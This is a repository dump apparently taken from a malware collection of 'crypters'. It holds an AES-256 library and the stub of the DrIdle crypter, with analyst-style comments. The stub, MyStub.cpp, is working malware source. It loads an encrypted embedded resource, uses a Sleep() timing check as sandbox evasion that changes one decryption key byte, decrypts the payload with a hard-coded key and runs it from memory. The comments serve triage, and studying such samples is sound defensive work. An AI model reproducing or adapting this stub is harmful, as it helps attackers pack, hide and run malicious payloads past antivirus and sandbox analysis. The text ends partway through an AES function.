    k[0] ^= rj_sbox(k[29]) ^ (*rc);
    k[1] ^= rj_sbox(k[30]);
    k[2] ^= rj_sbox(k[31]);
    k[3] ^= rj_sbox(k[28]);
} /* aes_expandDecKey */
297 |
298 |
299 | /* -------------------------------------------------------------------------- */
/*
 * Load a 32-byte key into the context. enckey keeps the key as supplied;
 * deckey starts as the same bytes and is then run through seven
 * aes_expandEncKey steps, which is the state aes256_decrypt_ecb starts from.
 * ctx->key is not written here.
 */
void aes256_init(aes256_context *ctx, uint8_t *k)
{
    uint8_t rcon = 1;
    uint8_t idx;
    uint8_t step;

    for (idx = 0; idx < sizeof(ctx->key); idx++) {
        const uint8_t byte = k[idx];

        ctx->deckey[idx] = byte;
        ctx->enckey[idx] = byte;
    }

    for (step = 0; step < 7; step++) {
        aes_expandEncKey(ctx->deckey, &rcon);
    }
} /* aes256_init */
308 |
309 | /* -------------------------------------------------------------------------- */
/*
 * Overwrite the three 32-byte key buffers in the context (key, enckey,
 * deckey) with zeros.
 */
void aes256_done(aes256_context *ctx)
{
    uint8_t idx = 0;

    while (idx < sizeof(ctx->key)) {
        ctx->deckey[idx] = 0;
        ctx->enckey[idx] = 0;
        ctx->key[idx] = 0;
        idx++;
    }
} /* aes256_done */
317 |
318 | /* -------------------------------------------------------------------------- */
/*
 * Encrypt one 16-byte block in place. The working key in ctx->key is
 * reloaded from ctx->enckey on every call and expanded as the rounds go.
 *
 * This is raw single-block ECB: there is no IV and no chaining, so equal
 * input blocks under one key give equal output blocks.
 */
void aes256_encrypt_ecb(aes256_context *ctx, uint8_t *buf)
{
    uint8_t rcon = 1;
    uint8_t round;

    aes_addRoundKey_cpy(buf, ctx->enckey, ctx->key);

    for (round = 1; round < 14; ++round) {
        aes_subBytes(buf);
        aes_shiftRows(buf);
        aes_mixColumns(buf);

        if ((round & 1) == 0) {
            /* even round: derive the next 32 key bytes, use the lower half */
            aes_expandEncKey(ctx->key, &rcon);
            aes_addRoundKey(buf, ctx->key);
        } else {
            /* odd round: use the upper half of the current key bytes */
            aes_addRoundKey(buf, &ctx->key[16]);
        }
    }

    /* final round has no MixColumns */
    aes_subBytes(buf);
    aes_shiftRows(buf);
    aes_expandEncKey(ctx->key, &rcon);
    aes_addRoundKey(buf, ctx->key);
} /* aes256_encrypt_ecb */
337 |
338 | /* -------------------------------------------------------------------------- */
/*
 * Decrypt one 16-byte block in place. The working key in ctx->key is
 * reloaded from ctx->deckey on every call and stepped backwards with
 * aes_expandDecKey as the rounds go.
 *
 * This is raw single-block ECB: there is no IV and no chaining, so equal
 * ciphertext blocks under one key decrypt to equal plaintext blocks.
 */
void aes256_decrypt_ecb(aes256_context *ctx, uint8_t *buf)
{
    uint8_t rcon = 0x80;
    uint8_t round;

    aes_addRoundKey_cpy(buf, ctx->deckey, ctx->key);
    aes_shiftRows_inv(buf);
    aes_subBytes_inv(buf);

    for (round = 13; round >= 1; round--) {
        if ((round & 1) != 0) {
            /* odd round: step the key back first, then use its upper half */
            aes_expandDecKey(ctx->key, &rcon);
            aes_addRoundKey(buf, &ctx->key[16]);
        } else {
            aes_addRoundKey(buf, ctx->key);
        }
        aes_mixColumns_inv(buf);
        aes_shiftRows_inv(buf);
        aes_subBytes_inv(buf);
    }

    aes_addRoundKey(buf, ctx->key);
} /* aes256_decrypt_ecb */
361 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter/aes256.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Byte-oriented AES-256 implementation.
3 | * All lookup tables replaced with 'on the fly' calculations.
4 | *
5 | * Copyright (c) 2007-2009 Ilya O. Levin, http://www.literatecode.com
6 | * Other contributors: Hal Finney
7 | *
8 | * Permission to use, copy, modify, and distribute this software for any
9 | * purpose with or without fee is hereby granted, provided that the above
10 | * copyright notice and this permission notice appear in all copies.
11 | *
12 | * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
13 | * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
14 | * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
15 | * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
16 | * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
17 | * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
18 | * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
19 | */
20 | #ifndef uint8_t
21 | #define uint8_t unsigned char
22 | #endif
23 |
24 | #ifdef __cplusplus
25 | extern "C" {
26 | #endif
27 |
/*
 * AES-256 context, three 32-byte buffers:
 *   key    - working round-key buffer; the encrypt/decrypt routines reload it
 *            from enckey or deckey at the start of every block
 *   enckey - the 32-byte key as passed to aes256_init
 *   deckey - that key after seven aes_expandEncKey steps (filled in by
 *            aes256_init); decryption starts from this state
 */
typedef struct {
    uint8_t key[32];
    uint8_t enckey[32];
    uint8_t deckey[32];
} aes256_context;


/* Load a 32-byte key into the context. */
void aes256_init(aes256_context *, uint8_t * /* key */);
/* Zero all three key buffers in the context. */
void aes256_done(aes256_context *);
/* Encrypt exactly one 16-byte block in place (ECB: no IV, no chaining). */
void aes256_encrypt_ecb(aes256_context *, uint8_t * /* plaintext */);
/* Decrypt exactly one 16-byte block in place (ECB: no IV, no chaining). */
void aes256_decrypt_ecb(aes256_context *, uint8_t * /* ciphertext */);
39 |
40 | #ifdef __cplusplus
41 | }
42 | #endif
43 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/DrIdle_crypter/MyEncrypter/MyEncrypter/stdafx.cpp
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/DrIdle_crypter/MyEncrypter/MyEncrypter/stdafx.h
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/DrIdle_crypter/MyEncrypter/MyEncrypter/targetver.h
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 11.00
3 | # Visual C++ Express 2010
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MyStub", "MyStub\MyStub.vcxproj", "{9891E9A9-F2C9-4EED-861B-932599CF7F80}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {9891E9A9-F2C9-4EED-861B-932599CF7F80}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {9891E9A9-F2C9-4EED-861B-932599CF7F80}.Debug|Win32.Build.0 = Debug|Win32
14 | {9891E9A9-F2C9-4EED-861B-932599CF7F80}.Release|Win32.ActiveCfg = Release|Win32
15 | {9891E9A9-F2C9-4EED-861B-932599CF7F80}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/DrIdle_crypter/MyStub/MyStub.suo
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/MyStub.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 | #include "aes256.h"
3 | #include "resourcemanager.h"
4 | #include
5 | //#include
6 |
// Analyst note: timing check around Sleep(2000).
// Samples the system clock before and after a two-second sleep and repeats
// until both samples fall in the same minute, so the wSecond subtraction
// below cannot wrap. Returns 1 when more than one second of clock time
// elapsed, 0 otherwise. An environment that shortens or skips Sleep() would
// produce 0; the caller feeds this result into the decryption key, so the
// check gates the payload rather than aborting visibly.
int isCodeExecuted() {
    SYSTEMTIME st1, st2;
    do {
        GetSystemTime(&st1);
        Sleep(2000);
        GetSystemTime(&st2);
    } while (st1.wMinute != st2.wMinute); // retry if the minute rolled over

    if (st2.wSecond - st1.wSecond > 1) {
        return 1;
    } else {
        return 0;
    }
}
21 |
// Analyst note: stub entry point. Flow as written:
//   1. load resource id 132 of type "BIN" from this executable
//   2. copy it to a heap buffer
//   3. run the Sleep() timing check
//   4. AES-256 decrypt the buffer block by block (ECB) with a key that is
//      hard-coded below, except for one byte chosen by the timing check
//   5. hand the buffer and this process's own path to RunFromMemory
// For triage: the embedded resource, the 32-byte key and both candidate
// values of the variable byte are all recoverable statically from the
// binary, so the payload can be decrypted offline without executing the stub.
int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow)
{
    //********* read resource **********************
    unsigned long dwSize;
    unsigned char* resourcePtr = ResourceManager::GetResource(132, "BIN", &dwSize);
    if (resourcePtr == NULL) return 0;
    //**********************************************

    //********* copy to heap **********************
    unsigned char* lpMemory = (unsigned char*)malloc(dwSize);
    memset(lpMemory,0,dwSize);
    memcpy (lpMemory, resourcePtr, dwSize);
    //*********************************************

    //********* check if code is executed *********
    int isExecuted = isCodeExecuted();
    //*********************************************

    //********* AES decryption ********************
    // Key byte 18 depends on the timing result; presumably 0x7d is the value
    // the payload was encrypted with and 0x61 yields garbage -- confirm
    // against the encrypter, which is not shown here.
    unsigned char keyVal;
    if (isExecuted) {
        keyVal = 0x7d;
    } else {
        keyVal = 0x61;
    }
    unsigned char key[32] = {
        0x53, 0x28, 0x40, 0x6e, 0x2f, 0x64, 0x63, 0x5d, 0x2d, 0x61, 0x77, 0x40, 0x76, 0x71, 0x77, 0x28,
        0x74, 0x61, keyVal, 0x66, 0x61, 0x73, 0x3b, 0x5d, 0x66, 0x6d, 0x3c, 0x3f, 0x7b, 0x66, 0x72, 0x36
    };

    aes256_context ctx;
    aes256_init(&ctx, key);

    unsigned char *buf;

    // Only whole 16-byte blocks are decrypted; any trailing dwSize % 16
    // bytes are left exactly as they were in the resource.
    for (unsigned long i = 0; i < dwSize/16; i++) {
        buf = lpMemory + (i * 16);
        aes256_decrypt_ecb(&ctx, buf);
    }

    aes256_done(&ctx);
    //*********************************************

    //********* execute ***********
    ResourceManager::RunFromMemory(lpMemory,__argv[0]);
    //*****************************

    /*FILE *outFile = fopen("decrypted.dat", "wb");
    fwrite(text, size, 1, outFile);
    fclose (outFile);*/

    return 0;
}
75 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/MyStub.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 |
14 | {9891E9A9-F2C9-4EED-861B-932599CF7F80}
15 | Win32Proj
16 | MyStub
17 |
18 |
19 |
20 | Application
21 | true
22 | MultiByte
23 |
24 |
25 | Application
26 | false
27 | true
28 | MultiByte
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 | true
42 |
43 |
44 | false
45 |
46 |
47 |
48 | Use
49 | Level3
50 | Disabled
51 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
52 | MultiThreadedDebug
53 |
54 |
55 | Windows
56 | true
57 |
58 |
59 |
60 |
61 | Level3
62 | Use
63 | MaxSpeed
64 | true
65 | true
66 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
67 | MultiThreaded
68 |
69 |
70 | Windows
71 | true
72 | true
73 | true
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 | MultiThreaded
88 | MultiThreadedDebug
89 |
90 |
91 | Create
92 | Create
93 |
94 |
95 |
96 |
97 |
98 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/MyStub.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Headerdateien
20 |
21 |
22 | Headerdateien
23 |
24 |
25 | Headerdateien
26 |
27 |
28 | Headerdateien
29 |
30 |
31 | Headerdateien
32 |
33 |
34 |
35 |
36 | Quelldateien
37 |
38 |
39 | Quelldateien
40 |
41 |
42 | Quelldateien
43 |
44 |
45 | Quelldateien
46 |
47 |
48 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/MyStub.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/Resource.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/DrIdle_crypter/MyStub/MyStub/Resource.h
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/aes256.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | * Byte-oriented AES-256 implementation.
3 | * All lookup tables replaced with 'on the fly' calculations.
4 | *
5 | * Copyright (c) 2007-2009 Ilya O. Levin, http://www.literatecode.com
6 | * Other contributors: Hal Finney
7 | *
8 | * Permission to use, copy, modify, and distribute this software for any
9 | * purpose with or without fee is hereby granted, provided that the above
10 | * copyright notice and this permission notice appear in all copies.
11 | *
12 | * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
13 | * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
14 | * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
15 | * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
16 | * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
17 | * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
18 | * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
19 | */
20 | #include "stdafx.h"
21 | #include "aes256.h"
22 |
/*
 * Round-constant helpers in GF(2^8).
 * F(x)  doubles x, folding in 0x1b when bit 7 of x was set.
 * FD(x) is the reverse step: halves x, folding in 0x8d when bit 0 was set.
 * Both expand to int expressions and evaluate x more than once; the key
 * schedule stores the result back into a uint8_t (`*rc = F(*rc)`).
 */
#define F(x) (((x)<<1) ^ ((((x)>>7) & 1) * 0x1b))
#define FD(x) (((x) >> 1) ^ (((x) & 1) ? 0x8d : 0))
25 |
26 | // #define BACK_TO_TABLES
27 | #ifdef BACK_TO_TABLES
28 |
29 | const uint8_t sbox[256] = {
30 | 0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5,
31 | 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76,
32 | 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0,
33 | 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0,
34 | 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc,
35 | 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15,
36 | 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a,
37 | 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75,
38 | 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0,
39 | 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84,
40 | 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b,
41 | 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf,
42 | 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85,
43 | 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8,
44 | 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5,
45 | 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2,
46 | 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17,
47 | 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73,
48 | 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88,
49 | 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb,
50 | 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c,
51 | 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79,
52 | 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9,
53 | 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08,
54 | 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6,
55 | 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a,
56 | 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e,
57 | 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e,
58 | 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94,
59 | 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf,
60 | 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68,
61 | 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16
62 | };
63 | const uint8_t sboxinv[256] = {
64 | 0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38,
65 | 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb,
66 | 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87,
67 | 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb,
68 | 0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d,
69 | 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e,
70 | 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2,
71 | 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25,
72 | 0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16,
73 | 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92,
74 | 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda,
75 | 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84,
76 | 0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a,
77 | 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06,
78 | 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02,
79 | 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b,
80 | 0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea,
81 | 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73,
82 | 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85,
83 | 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e,
84 | 0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89,
85 | 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b,
86 | 0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20,
87 | 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4,
88 | 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31,
89 | 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f,
90 | 0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d,
91 | 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef,
92 | 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0,
93 | 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61,
94 | 0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26,
95 | 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d
96 | };
97 |
98 | #define rj_sbox(x) sbox[(x)]
99 | #define rj_sbox_inv(x) sboxinv[(x)]
100 |
101 | #else /* tableless subroutines */
102 |
103 | /* -------------------------------------------------------------------------- */
/*
 * Anti-logarithm in GF(2^8) to base 3: returns 3 raised to the power x,
 * reduced with the 0x1b polynomial. Runs x loop iterations, so the time
 * taken depends on the argument.
 */
uint8_t gf_alog(uint8_t x)
{
    uint8_t power = 1;
    uint8_t step;

    for (step = 0; step < x; step++) {
        /* multiply by 3: (power * 2) xor power */
        uint8_t doubled = (uint8_t)(power << 1);

        if (power & 0x80) {
            doubled ^= 0x1b;
        }
        power ^= doubled;
    }

    return power;
} /* gf_alog */
112 |
113 | /* -------------------------------------------------------------------------- */
/*
 * Logarithm in GF(2^8) to base 3: returns the smallest exponent e with
 * 3^e == x, found by stepping through the powers of 3. Returns 0 when no
 * power matches within 256 steps (x == 0). The loop exits as soon as the
 * match is found, so the time taken depends on the argument.
 */
uint8_t gf_log(uint8_t x)
{
    uint8_t power = 1;
    unsigned exponent;

    for (exponent = 0; exponent < 256; exponent++) {
        uint8_t doubled;

        if (power == x) {
            return (uint8_t)exponent;
        }

        /* multiply by 3: (power * 2) xor power */
        doubled = (uint8_t)(power << 1);
        if (power & 0x80) {
            doubled ^= 0x1b;
        }
        power ^= doubled;
    }

    return 0;
} /* gf_log */
125 |
126 |
127 | /* -------------------------------------------------------------------------- */
/*
 * Multiplicative inverse in GF(2^8), computed as alog(255 - log(x)).
 * Zero has no inverse and maps to 0.
 */
uint8_t gf_mulinv(uint8_t x)
{
    if (x == 0) {
        return 0;
    }

    return gf_alog(255 - gf_log(x));
} /* gf_mulinv */
132 |
133 | /* -------------------------------------------------------------------------- */
/*
 * Compute one S-box entry without a table: take the GF(2^8) inverse of x,
 * XOR it with its four successive one-bit left rotations, then XOR 0x63.
 */
uint8_t rj_sbox(uint8_t x)
{
    uint8_t rot = gf_mulinv(x);
    uint8_t acc = rot;
    uint8_t pass;

    for (pass = 0; pass < 4; pass++) {
        rot = (rot << 1) | (rot >> 7);
        acc ^= rot;
    }

    return (acc ^ 0x63);
} /* rj_sbox */
144 |
145 | /* -------------------------------------------------------------------------- */
/*
 * Compute one inverse S-box entry without a table: undo the 0x63 XOR and
 * the bit-rotation mixing, then take the GF(2^8) inverse of the result.
 */
uint8_t rj_sbox_inv(uint8_t x)
{
    uint8_t rot = x ^ 0x63;
    uint8_t acc;

    rot = (rot << 1) | (rot >> 7);   /* rotate left by 1 */
    acc = rot;
    rot = (rot << 2) | (rot >> 6);   /* by 2 more */
    acc ^= rot;
    rot = (rot << 3) | (rot >> 5);   /* by 3 more */
    acc ^= rot;

    return gf_mulinv(acc);
} /* rj_sbox_inv */
156 |
157 | #endif
158 |
159 | /* -------------------------------------------------------------------------- */
/*
 * Double x in GF(2^8): shift left by one and fold in 0x1b when the bit
 * shifted out of the top was set.
 */
uint8_t rj_xtime(uint8_t x)
{
    uint8_t doubled = (uint8_t)(x << 1);

    if (x & 0x80) {
        doubled ^= 0x1b;
    }

    return doubled;
} /* rj_xtime */
164 |
165 | /* -------------------------------------------------------------------------- */
/*
 * SubBytes: replace each of the 16 state bytes with its rj_sbox value,
 * from index 15 down to 0.
 */
void aes_subBytes(uint8_t *buf)
{
    uint8_t pos = 16;

    do {
        pos--;
        buf[pos] = rj_sbox(buf[pos]);
    } while (pos != 0);
} /* aes_subBytes */
172 |
173 | /* -------------------------------------------------------------------------- */
/*
 * Inverse SubBytes: replace each of the 16 state bytes with its
 * rj_sbox_inv value, from index 15 down to 0.
 */
void aes_subBytes_inv(uint8_t *buf)
{
    uint8_t pos = 16;

    do {
        pos--;
        buf[pos] = rj_sbox_inv(buf[pos]);
    } while (pos != 0);
} /* aes_subBytes_inv */
180 |
181 | /* -------------------------------------------------------------------------- */
/*
 * AddRoundKey: XOR the 16-byte round key at `key` into the 16-byte state
 * at `buf`, in place. Bytes are processed from index 15 down to 0.
 */
void aes_addRoundKey(uint8_t *buf, uint8_t *key)
{
    uint8_t pos = 16;

    do {
        pos--;
        buf[pos] ^= key[pos];
    } while (pos != 0);
} /* aes_addRoundKey */
188 |
189 | /* -------------------------------------------------------------------------- */
/*
 * AddRoundKey that also loads the working key: copies all 32 bytes of `key`
 * into `cpk` and XORs the first 16 of them into the state `buf`.
 */
void aes_addRoundKey_cpy(uint8_t *buf, uint8_t *key, uint8_t *cpk)
{
    uint8_t pos = 16;

    do {
        uint8_t low;

        pos--;
        low = key[pos];
        cpk[pos] = low;              /* lower half of the key copy */
        buf[pos] ^= low;             /* ...which is also the round key */
        cpk[16 + pos] = key[16 + pos]; /* upper half is copied only */
    } while (pos != 0);
} /* aes_addRoundKey_cpy */
196 |
197 |
198 | /* -------------------------------------------------------------------------- */
/*
 * ShiftRows on a 16-byte state stored column by column: row 1 rotates left
 * by one column, row 2 by two, row 3 by three. Row 0 (bytes 0, 4, 8, 12)
 * is left untouched.
 */
void aes_shiftRows(uint8_t *buf)
{
    uint8_t saved;

    /* row 1: indices 1, 5, 9, 13 */
    saved = buf[1];
    buf[1] = buf[5];
    buf[5] = buf[9];
    buf[9] = buf[13];
    buf[13] = saved;

    /* row 2: two swaps, 2<->10 and 6<->14 */
    saved = buf[10];
    buf[10] = buf[2];
    buf[2] = saved;
    saved = buf[14];
    buf[14] = buf[6];
    buf[6] = saved;

    /* row 3: indices 3, 7, 11, 15 */
    saved = buf[3];
    buf[3] = buf[15];
    buf[15] = buf[11];
    buf[11] = buf[7];
    buf[7] = saved;
} /* aes_shiftRows */
209 |
210 | /* -------------------------------------------------------------------------- */
/*
 * Inverse ShiftRows: row 1 rotates right by one column, row 2 by two,
 * row 3 by three, undoing aes_shiftRows on a 16-byte state.
 */
void aes_shiftRows_inv(uint8_t *buf)
{
    uint8_t saved;

    /* row 1: indices 1, 5, 9, 13 */
    saved = buf[1];
    buf[1] = buf[13];
    buf[13] = buf[9];
    buf[9] = buf[5];
    buf[5] = saved;

    /* row 2: two swaps, 2<->10 and 6<->14 */
    saved = buf[2];
    buf[2] = buf[10];
    buf[10] = saved;
    saved = buf[6];
    buf[6] = buf[14];
    buf[14] = saved;

    /* row 3: indices 3, 7, 11, 15 */
    saved = buf[3];
    buf[3] = buf[7];
    buf[7] = buf[11];
    buf[11] = buf[15];
    buf[15] = saved;
} /* aes_shiftRows_inv */
221 |
222 | /* -------------------------------------------------------------------------- */
/*
 * MixColumns: transforms each of the four 4-byte columns of the state in
 * place, using rj_xtime for the GF(2^8) doubling.
 */
void aes_mixColumns(uint8_t *buf)
{
    uint8_t col;

    for (col = 0; col < 16; col += 4) {
        uint8_t *s = buf + col;
        /* snapshot the column first: every output byte uses the old values */
        const uint8_t a = s[0], b = s[1], c = s[2], d = s[3];
        const uint8_t sum = a ^ b ^ c ^ d;

        s[0] ^= sum ^ rj_xtime(a ^ b);
        s[1] ^= sum ^ rj_xtime(b ^ c);
        s[2] ^= sum ^ rj_xtime(c ^ d);
        s[3] ^= sum ^ rj_xtime(d ^ a);
    }
} /* aes_mixColumns */
235 |
236 | /* -------------------------------------------------------------------------- */
/*
 * Inverse MixColumns: undoes aes_mixColumns on each 4-byte column of the
 * state, again built only from XORs and rj_xtime doublings.
 */
void aes_mixColumns_inv(uint8_t *buf)
{
    uint8_t col;

    for (col = 0; col < 16; col += 4) {
        uint8_t *s = buf + col;
        /* snapshot the column first: every output byte uses the old values */
        const uint8_t a = s[0], b = s[1], c = s[2], d = s[3];
        const uint8_t sum = a ^ b ^ c ^ d;
        const uint8_t dbl = rj_xtime(sum);
        /* correction shared by bytes 0/2 and by bytes 1/3 respectively */
        const uint8_t even = sum ^ rj_xtime(rj_xtime(dbl ^ a ^ c));
